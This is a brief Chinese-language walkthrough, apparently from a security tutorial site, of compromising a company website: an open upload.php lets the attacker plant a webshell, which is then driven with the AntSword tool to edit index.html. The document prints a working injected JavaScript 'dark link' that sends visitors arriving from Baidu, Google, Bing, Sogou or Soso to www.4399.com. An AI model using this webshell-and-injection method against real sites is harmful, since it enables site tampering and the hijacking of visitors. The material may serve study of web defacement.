合规国际互联网加速 OSASE为企业客户提供高速稳定SD-WAN国际加速解决方案。 广告
[TOC] ## 攻击步骤 * 正常的公司首页 * 经过扫描发现目录下存在文件上传:upload.php,并且可以上传木马程序 1、发现公司网站存在文件上传的页面,尝试上传 webshell 可以成功 2、使用蚁剑连接 webshell 成功 3、在蚁剑中,修改公司首页的代码,在index.html中插入js代码,在页面中插入暗链 ``` <script type="text/javascript"> var search=document.referrer; if(search.indexOf("baidu")>0||search.indexOf("bing")>0||search.indexOf("soso")>0||search.indexOf("google")> 0||search.indexOf("sogou")>0) self.location="http://www.4399.com/"; </script> ``` * 在页面中插入暗链后,只要 referer 中存在 baidu、google、sogou等的都会转到 www.4399.com 页面